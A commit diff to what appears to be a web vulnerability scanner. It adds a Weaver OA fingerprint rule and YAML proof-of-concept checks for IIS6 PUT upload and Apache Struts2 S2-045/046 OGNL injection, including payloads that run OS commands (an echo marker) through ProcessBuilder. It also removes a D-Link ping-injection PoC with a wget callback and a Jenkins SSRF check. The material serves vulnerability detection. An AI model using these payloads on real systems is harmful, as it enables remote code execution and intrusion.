修改、添加poc

WebScan/info/rules.go

@@ -63,6 +63,7 @@ var RuleDatas = []RuleData{
 	{"华为 MCU", "code", "(McuR5-min.js)"},
 	{"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
 	{"泛微协同办公OA", "headers", "(ecology_JSessionid)"},
+	{"泛微协同办公OA", "code", "(/spa/portal/public/index.js)"},
 	{"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
 	{"360网站卫士", "code", "(360wzb)"},
 	{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},

WebScan/pocs/dlink-cve-2019-16920-rce.yml

@@ -1,19 +0,0 @@
-name: poc-yaml-dlink-cve-2019-16920-rce
-set:
-  reverse: newReverse()
-  reverseURL: reverse.url
-rules:
-  - method: POST
-    path: /apply_sec.cgi
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: >-
-      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
-    follow_redirects: true
-    expression: |
-      response.status == 200 && reverse.wait(5)
-detail:
-  author: JingLing(https://hackfun.org/)
-  links:
-    - https://www.anquanke.com/post/id/187923
-    - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3

WebScan/pocs/iis6.0-put.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-iis-put-getshell
+set:
+  filename: randomLowercase(6)
+  fileContent: randomLowercase(6)
+
+rules:
+  - method: PUT
+    path: /{{filename}}.txt
+    body: |
+      {{fileContent}}
+    expression: |
+      response.status == 201
+  - method: GET
+    path: /{{filename}}.txt
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(fileContent))
+detail:
+  author: Cannae(github.com/thunderbarca)
+  links:
+    - https://www.cnblogs.com/-mo-/p/11295400.html

WebScan/pocs/jenkins-cve-2018-1000600.yml

@@ -1,13 +0,0 @@
-name: poc-yaml-jenkins-cve-2018-1000600
-set:
-    reverse: newReverse()
-    reverseUrl: reverse.url
-rules:
-    - method: GET
-      path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}}
-      expression: |
-        response.status == 200 && reverse.wait(5)
-detail:
-    author: PickledFish(https://github.com/PickledFish)
-    links:
-        - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/

WebScan/pocs/struts2-045-1.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-struts2_045-1
+set:
+  r1: randomInt(800, 1000)
+  r2: randomInt(800, 1000)
+rules:
+  - method: GET
+    path: /
+    headers:
+      Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
+    follow_redirects: true
+    expression: |
+      response.headers["Keyvalue"].contains(string(r1 * r2))
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
+

WebScan/pocs/struts2-045-2.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-struts2_045-2
+rules:
+  - method: GET
+    path: /
+    headers:
+      Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}"
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(b"struts2_security_check")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
+

WebScan/pocs/struts2-045-3.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-struts2_045-3
+rules:
+  - method: GET
+    path: /
+    headers:
+      Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('echo struts2_security_check'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}"
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(b"struts2_security_check")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
+

WebScan/pocs/struts2-046-1.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-struts2_046-1
+set:
+  r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
+rules:
+  - method: POST
+    path: /
+    headers:
+      Content-Type: multipart/form-data; boundary=---------------------------
+    follow_redirects: true
+    body: |
+      {{r1}}
+    expression: |
+      response.body.bcontains(b"struts2_security_check")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
+

WebScan/pocs/struts2-046-2.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-struts2_046-2
+set:
+  r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo\x20struts2_security_check').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
+rules:
+  - method: POST
+    path: /
+    headers:
+      Content-Type: multipart/form-data; boundary=---------------------------
+    follow_redirects: true
+    body: |
+      {{r1}}
+    expression: |
+      response.body.bcontains(b"struts2_security_check")
+detail:
+  author: shadown1ng(https://github.com/shadown1ng)
+